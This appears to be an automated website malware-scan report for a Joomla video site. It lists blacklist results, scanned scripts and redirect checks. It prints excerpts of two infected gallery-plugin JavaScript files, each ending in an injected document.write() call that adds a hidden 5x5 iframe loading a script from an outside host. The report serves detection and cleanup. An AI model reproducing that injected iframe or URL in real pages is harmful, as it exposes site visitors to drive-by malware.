Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=jonclarkvideo.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://jonclarkvideo.com/
Result: The website is marked by Yandex as suspicious; visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious; visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://jonclarkvideo.com/ | 200 OK Content-Length: 18506 Content-Type: text/html | clean |
http://jonclarkvideo.com/media/system/js/caption.js | 200 OK Content-Length: 2150 Content-Type: application/javascript | clean |
http://www.google.com/jsapi | 200 OK Content-Length: 24552 Content-Type: text/javascript | clean |
http://jonclarkvideo.com/plugins/content/sigplus/js/safemode.initialize.min.js | 200 OK Content-Length: 736 Content-Type: application/javascript | clean |
http://jonclarkvideo.com/plugins/content/sigplus/js/safemode.finalize.min.js | 200 OK Content-Length: 419 Content-Type: application/javascript | clean |
http://jonclarkvideo.com/plugins/content/sigplus/engines/boxplus/popup/js/boxplus.min.js | 200 OK Content-Length: 10407 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The excerpt appears to be cut in the middle (marked [...]). The injected part is the trailing document.write() call, appended after the end of the boxplus library code, which writes a 5x5 iframe pointing at a host other than the scanned site:
if(typeof __jQuery__=="undefined")var __jQuery__=jQuery; (function(d){function y(a,b){var c=parseInt(a.css(b));return isNaN(c)?a[b]():c}function s(a){return y(a,"width")}function F(a,b){return parseInt(a.css("margin-"+b))||0}function G(a){var b=a.charAt(0).toUpperCase()+a.slice(1),c="client"+b,e=w[c];c=document.documentElement[c];b=window["inner"+b];e=e?e:Infinity;c=c?c:Infinity;b=b?b:Infinity;return Math.min(e,c,b,d(window)[a]())}function za(a){var b=a.attr("src");a=a.attr("longdesc");retur [...] function(a){na(this).boxplusConfigure(a);return this};d.boxplus={change:u,previous:T,next:U,refresh:J,configure:function(a){return d.extend(Z,a)}}})(__jQuery__);
;document.write('<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>');
Antivirus reports:
Hidden iFrame found. size: 5x5 src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8 <iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"> | ||
http://jonclarkvideo.com/plugins/content/sigplus/engines/boxplus/lang/boxplus.lang.min.js | 200 OK Content-Length: 3474 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The excerpt appears to be cut in the middle (marked [...]). The injected part is the trailing document.write() call, appended after the end of the boxplus language code, which writes a 5x5 iframe pointing at a host other than the scanned site:
if(typeof __jQuery__=="undefined")var __jQuery__=jQuery; (function(a){var e="",f={en:{language:"English",first:"First",prev:"Previous",next:"Next",last:"Last",start:"Start slideshow",stop:"Stop slideshow",close:"Close",enlarge:"Enlarge",shrink:"Shrink",download:"Download",metadata:"Image metadata"},de:{language:"Deutsch",first:"Erstes",prev:"Zurück",next:"Weiter",last:"Letztes",start:"Diashow starten",stop:"Diashow anhalten",close:"Schließen",enlarge:"Vergrößern",shrink:"Verkleinern",dow [...] a("span.boxplus-"+d).html(h)})}return e};a(function(){var b=/lang=([a-z]{2,})(?:-([A-Z]{2,}))?/;a('script[src*="boxplus"][src*=lang]').each(function(){var c=b.exec(a(this).attr("src"));c&&a.boxplusLanguage(c[1],c[2])})})})(__jQuery__);
;document.write('<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>');
Antivirus reports:
Hidden iFrame found. size: 5x5 src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8 <iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"> | ||
http://jonclarkvideo.com/plugins/content/sigplus/engines/boxplus/slider/js/boxplus.slider.min.js | 200 OK Content-Length: 4703 Content-Type: application/javascript | suspicious |
Hidden iFrame found. size: 5x5 src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8 <iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"> | ||
http://jonclarkvideo.com/plugins/content/avreloaded/silverlight.js | 200 OK Content-Length: 8093 Content-Type: application/javascript | clean |
http://jonclarkvideo.com/plugins/content/avreloaded/wmvplayer.js | 200 OK Content-Length: 16475 Content-Type: application/javascript | clean |
http://jonclarkvideo.com/plugins/content/avreloaded/swfobject.js | 200 OK Content-Length: 12253 Content-Type: application/javascript | clean |
http://jonclarkvideo.com/plugins/content/avreloaded/avreloaded.js | 200 OK Content-Length: 2358 Content-Type: application/javascript | clean |
https://count.carrierzone.com/app/count_server/count.js | 200 OK Content-Length: 36029 Content-Type: text/javascript | clean |
http://jonclarkvideo.com/index.php?option=com_content&view=category&layout=blog&id=34&Itemid=54 | 200 OK Content-Length: 5404 Content-Type: text/html | clean |
http://jonclarkvideo.com/index.php?option=com_content&view=category&layout=blog&id=39&Itemid=55 | 200 OK Content-Length: 17428 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: jonclarkvideo.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 03 Jun 2014 19:55:12 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 03 Jun 2014 19:55:13 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 0676f3e0e4e5d22e79876d1e00e70bad=b26c67313a1ef68164535b2ec3dd0536; path=/
GET / HTTP/1.1
Host: jonclarkvideo.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 03 Jun 2014 19:55:12 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 03 Jun 2014 19:55:13 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 0676f3e0e4e5d22e79876d1e00e70bad=b26c67313a1ef68164535b2ec3dd0536; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: jonclarkvideo.com
Referer: http://www.google.com/search?q=jonclarkvideo.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: jonclarkvideo.com
Referer: http://www.google.com/search?q=jonclarkvideo.com
Result:
The result is similar to the first query. There are no suspicious redirects found.